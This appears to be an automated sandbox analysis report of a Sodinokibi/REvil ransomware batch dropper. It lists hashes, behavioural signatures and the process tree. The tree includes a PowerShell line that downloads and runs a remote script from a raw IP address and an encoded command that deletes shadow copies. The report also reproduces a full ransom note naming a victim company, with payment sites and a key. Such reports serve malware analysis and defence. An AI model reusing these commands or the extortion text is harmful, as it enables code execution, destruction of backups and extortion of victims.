Analysis

  • max time kernel
    140s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    11-06-2020 21:10

General

  • Target

    25beb425e3126143f961ead9e6eda285.bat

  • Size

    220B

  • MD5

    f519bf505e47286d4237924b8d9b7aac

  • SHA1

    503b29182aa3c2b01f3ac4a4846eae307e1c22bc

  • SHA256

    a22cfd42ad2a8cec8a49dc236b16ed7579c0ece0e048546b759a9fc620b79987

  • SHA512

    28300f35bc17da4eb060ee5cac3258c1dd57b4f287bdd63c107bd3f5c25246d6a34bba484ee8c4cdaf615c7ef4498fc02665c0268f59b92b05d74fbfeb936c8c

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/25beb425e3126143f961ead9e6eda285

Extracted

Path

C:\lu37p99-read-me.txt

Family

sodinokibi

Ransom Note
---=== Welcome VALUTEC IMMOBILIARE E SERVIZI SRL ===--- [+] Whats Happen? [+] Your internal network has been penetrated. Your files are encrypted with strong military algorithm, and currently unavailable. You can check it: all files on your system has extension lu37p99. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). Also, all your business info copyed to our servers. If you do not take action to contact us, the data will be published for free access everyone. It can also cause GDPR compliance. “Article 32, (1) – c states that “The controller and the processor shall implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk, including the ability to restore the availability and access to personal data in a timely manner in the event of a physical or technical incident.” It can hurt organizations where it matters most – Penalties can be as high as €20M or 4% of annual revenues, not to mention the negative public relations fallout. As soon as we receive the payment, all data will be deleted from our servers. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/12C8467C41A02011 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/12C8467C41A02011 Contact with us in chat on website. You have 3 days. If you need more time to make a decision and collect money for payment - inform the support chat about this. [+] How will the decryption process proceed after payment? [+] After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: EwegGyVJRUWQTpAiTTH2GudksbrRBTRsJzMU51aKBzK+b5H3ZbnWnYo/Ymy8JiHA 2Kn3CXDK3McC2W4ylYkc36YMzL5OKd7AHU2VdCBujRwNbezY5SR3tab8aihJqWj9 LudL3zNCw+IB69REQynGriNwM+KiSbcFfmXziE4XAgcFHzZtCAVqMofIU9AC5sVd vmIAUQpof8zwu06w6jJZRNMn5jnw1EJ7zR0jxbKE4iEjILDOCWo8mJ0BaDY3fvfF vTj6e1K9m0avWtMKX+6oywjK3gEBdg6Gqbj6bCFJ4ewzfpwhcNNMcXKr0PxV7Pt9 QNpT+9VChFe1eN2Seh1pZci/g037hzyWw+viu3Agg7wkrqOCQkIlVS2QC+C0tlIs I26FDhImCHq2dA3L9p353QsHfxhRqPkVFIBZz+4l+gze8fHQdK6Y9Y1I/PEsk3Xf W/3Yj2xcghKqYswIvmw7Y6fdHhhydaBH5XocnIPDpFzklHkAA1+QOBTcVnmR1cxz NB3JyxP5ylc+eq6i6l4i12E28c6jErCKnaOTT3YY2WyIRVxorOmuhwdkMWGSfcR0 TU83+4kCkKtb6G9hwdBleyPVhbbpQ6uKGhE31/hYRhVNIO2Z/YH5nXS1JR0E0L/B pzFj+Cxj70drte98wLwjF9YsEB7LgMzx/EyDsrc3xxA3m4AlIg1SYwl5AC3Bllqa xnTrd4gVmVdqP231g3srV54zk/FMEgPIkL9MkxXpzmA/yXswkCi4yGp9KQr6+g0q dg5+HU8CoPGifZFdz7bJPzCRpqE4lyj+HVYCO0TQfjpffGcfQmbpaF/4UnMc6ih9 YVNf9k3227fhiZ9my+P8CLGbpSdLRIYCOKvwfkul3mxjc9soSFDOMaDOxMZEQvJD xrxUydT4SeeC/ujaHb9YfeaZtOlkUQjiKpNJE16A7N7He9LgYBn6h30YgWl57VHr NR3G6Fcjcw9LptJEGlkCsoli8N2GpcJwEVbAyCWSf1jOUjGumjXFpdInMcJGapkb gdfkLCrKFJWu6DKJp+JthF/80uu8ccXg2iCD80UGwsacysXtNjTekDJrQk6zGraT a+iwJfew7dyJtIyJMOESFhqQJJiG5X+QzHuzmaeG6voF8640u/JmQY0ENoyD5szS DD3gMmWGgnx2Vd4Is3xyZVzZ7wrwhm9sEFcpCcZDT5qDRYn4vFK3pr5VkAsHqAsB QG0W9P55xGWFv8XHJBwTfdkE5JPTa+taD60u+JtQMeDsz1rJf3v0LV1hqzEE2tUX c181ptjHLEWP7RgXl3EQBz/rAzGLaQUlqZPkJp/TbBWMyg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Blacklisted process makes network request 138 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 22 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\25beb425e3126143f961ead9e6eda285.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/25beb425e3126143f961ead9e6eda285');Invoke-YOGGLCMTVFBXE;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Modifies system certificate store
      PID:1472
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1044
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1868

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms